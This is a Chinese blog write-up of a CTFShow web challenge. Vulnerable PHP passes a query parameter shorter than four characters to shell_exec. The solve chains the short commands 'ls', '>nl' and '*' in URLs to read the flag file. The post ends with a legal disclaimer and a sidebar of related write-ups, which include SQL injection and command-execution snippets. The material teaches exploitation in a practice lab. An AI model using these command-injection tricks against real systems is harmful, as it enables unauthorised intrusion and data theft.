【CTF Web】CTFShow 获得百分之百的快乐 Writeup(RCE+Linux命令+代码审计)

于 2024-06-01 12:50:40 发布
阅读量758 收藏 3
点赞数 25
分类专栏: CTF Writeup 文章标签: web安全 安全 网络安全 前端 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34988204/article/details/138027294
版权

获得百分之百的快乐

3
阿呆开发了自己的博客系统,准备对欺负他的大佬口吐芬芳

解法

<?php
show_source(__FILE__);
error_reporting(0);
if(strlen($_GET[1])<4){
     echo shell_exec($_GET[1]);
}
else{
     echo "hack!!!";
}
?>
//by Firebasky
//by Firebasky

只能执行长度小于四的命令。先看看有哪些文件:

https://56dcf333-a4d9-4eae-8545-cba9202fbf33.challenge.ctf.show/?1=ls

secretsecret_ctfshow_36dddddddddd.php 文件名很长,无法直接使用。

创建一个叫 nl 的文件。

https://d10681bd-ab06-4ac1-b7a0-ad59374670e4.challenge.ctf.show/?1=>nl

访问 nl。

https://d10681bd-ab06-4ac1-b7a0-ad59374670e4.challenge.ctf.show/?1=*

执行成功。

flag 在注释里。

Flag

ctfshow{ed72b01b-1181-444a-9bd1-309727ea06b0}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

HEX9CF
关注
专栏目录
CTFshow-Web入门writeup
m0_61596829的博客
06-08 605
CTFshow-Web入门writeup
[ctfshow]web入门——命令执行(web118-web122+web124)
ShenZ的博客
02-28 3781
[ctfshow]web入门——命令执行 文章目录[ctfshow]web入门——命令执行web118web119web120web121web122web124 web118 源码里有提示 非法输入会有evil input fuzz一下发现可以用大写字母A-Z和${}~.?: # echo ${PWD} /root # echo ${PWD:0:1} #表示从0下标开始的第一个字符 / # echo ${PWD:~0:1} #从结尾开始往前的第一个字符
ctf.show】获得百分之百快乐
最新发布
weixin_73625393的博客
04-12 223
得出flag值:ctfshow{4924e520-b9c0-4a90-8c1d-41e20ab39da1}发送请求值ls查看内容。
wp ctfshow 萌新 获得百分之百快乐&&web23&&web24
2301_81040377的博客
03-30 678
(我试了一下more和cat都不行,应该是屏蔽了) 我用的朋友电脑所以截图就不提供了,大家将就着看。# 单起一个线程,爆破下一次upload的文件名 uploaded: uploads/20220818222707124.php。# 用本次的文件名推算下一次的文件名,相差sleep一次的时间间隔。# 用本次的文件名推算下一次的文件名,相差sleep一次的时间间隔。# 单起一个线程,爆破下一次upload的文件名。应该是可以直接得到flag的,如果不行把命令像上面一样改了就行。
ctfshow web学习记录
m0_64815693的博客
09-25 2648
ctfshow 学习记录
CTFshow_萌新解题
ymx520haha的博客
04-24 1464
得到字母,但不是flag,看到作者名字是培根,想到了培根密码,将A替换m,B替换d,AABBABABAAABBBABABBAAAAAAABBABAABBA得到,进行解密得到guowang,改为大写提交flag成功。下载完发现是一个音频文件,用au打开,发现一段长短波,考虑为摩斯(-- ..- --.. .. -.- .. ... --. ----- ----- -..)看代码,发现存在命令执行漏洞,尝试构造得到flag,使用system(“cat config,php”),f12看源码得到flag。
ctfshow MengXIn 下(pearcmd.php妙用&条件竞争&简单密码&简单misc)
weixin_63231007的博客
07-22 2228
通过可变信息通过GET方法是类似于参数传递给可执行文件。许多语言处理等方面argc和argv参数。argc是参数计数,并,argv是索引数组,包含的参数。如果您想声明变量$argc和$argv和模仿这种功能,使register_argc_argv。...
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
CTF工具之seay源代码审计系统(web).rar
09-16
CTF工具之seay源代码审计系统(web)】是一个专门为网络安全竞赛(CTF,Capture The Flag)设计的源代码审计工具,主要用于Web安全领域。这个工具的主要目的是帮助参赛者或者安全研究人员检测和分析Web应用程序中...
网络安全+CTF+源码审计+O泡易支付V1.zip
11-19
网络安全领域,CTF(Capture The Flag)是一种流行的学习和竞技方式,它涵盖了各种安全技能,包括源码审计。在这个“网络安全+CTF+源码审计+O泡易支付V1.zip”压缩包中,我们可以推测它包含了一个用于CTF挑战的...
ctfshow web入门刷题3
m0_59396535的博客
11-04 190
web15 看提示找到邮箱,然后尝试登入后台 url/admin,尝试点击忘记密码然后提示输入城市,尝试用qq搜索qq号,发现城市为西安,得到后台密码,登入得到flag WEB16 题目提示php探针,所以url/tz.php打开探针然后搜索flag得到flag ...
CTFShow“萌心区“WP题解
qq_41274349的博客
03-24 9813
CTFSow网站 萌新区题目概览: 萌新区一共47题,本文带来前45题的详细WP,最后两道题等待更新。 0x01 萌新认证 这道题,就是普通签到题,加入群,查看群公告即可。 或者喊一声萌新码 注意:萌新码是从一个固定池里随机分配的,不是统一的; 0x02:萌新_密码1: 看到一大串字母和英文,看了一下,没有大于F的字母,应该是16进制,将这串字符串进行base16转换【16进制转字符串】 解码后的字符串,凭感觉像base64编码,进行base64译码 ...
ctfshow-萌新
qq_43618536的博客
07-14 4560
ctfshow-萌新
CTF_ctfshow_meng新_web1-web24
weixin_54227009的博客
05-15 1471
打开靶机,发现包含有个config.php文件,打开进去没有数据 所以直接开始代码审计吧~ 有个变量为id,参数必须为1000才能获得flag,但id>999直接返回退出了。 尝试一下sql注入 整形注入: 看一下回显点 回显点为三 版本:10.3.18-MariaDB 数据库:web1 ?id=2 union select 1,2,database()# 表:article ?id=2 union select 1,2,group_concat.
CTF show萌新题系列
羽的博客
02-24 4859
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break ...
CTFSHOW做题记录
weixin_45990644的博客
03-30 567
CTFSHOW做题记录 ** CTFSHOW做题记录1 ** (菜菜的我要写日记啦,欢迎大佬指导) ** 密码学签到1 给出“}wohs.ftc{galf”并且提示倒叙。 ** 解题思路: 没看提示的时候乍一看以为是栅栏密码,还想着用在线解密去做,但是定睛一看不对劲,再看题目原来就是倒叙。只需要反着来就好啦。 ** 答案: flag{ctf.show} ** 今天也是元气满满的一天,好好学习。 ...
CTFshow---新春欢乐赛
unexpectedthing的博客
02-11 1209
新春欢乐赛热身web1web2web3web4web5web6web7 热身 直接执行phpinfo(),有回显 开始准备找flag,但是没找到 看到了auto_prepend_file,有文件目录 直接读取 f=system(“nl /etc/ssh/secret/youneverknow/secret.php”); web1 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-01-16 15:42:02 # @Last
CTFSHOW 萌新计划 web 1-8
羽的博客
04-02 3627
题目地址:http://ctf.show web1-7 目的很明确,有几种形式 构造出id=1000,或者sql语句绕过或者绕过函数。 0x01:进制转换 1.二进制 0b1111101000 2.十六进制 0x38e 0x02:字节操作 1.取反 2.异或 200^800 3,按位与 992|8 4.按位或 0x03:运算符 1.乘法 200*5 2.除法 10/0.01 3.减法 200–80...
ctfshow萌新红包题writeup
qq_45628145的博客
02-20 4670
ctfshow萌新专属红包题writeup 题目来源:https://ctf.show/ 这一题是ctfshow平台上面2月17日更新的一个萌新红包题,当天在官方交流群内知道晚上会有一个萌新红包题之后,就有点期待了(小萌新也想拿一次红包,嘿嘿),下面来看看这个题目吧。 进入题目之后,是一个ctfshow萌新登录页面。 首先,老规矩,先看源码。一顿操作之后,没有任何发现。群主在官方交流群里面先后...
CTF挑战:远程命令执行(RCE)与Web安全策略
"了解CTF(Capture The Flag)竞赛中关于远程命令执行(RCE)的概念,以及如何在Web安全场景下利用和防范此类漏洞" 远程命令执行(RCE)是一种严重的安全漏洞,它允许攻击者通过Web接口执行任意系统命令。当服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值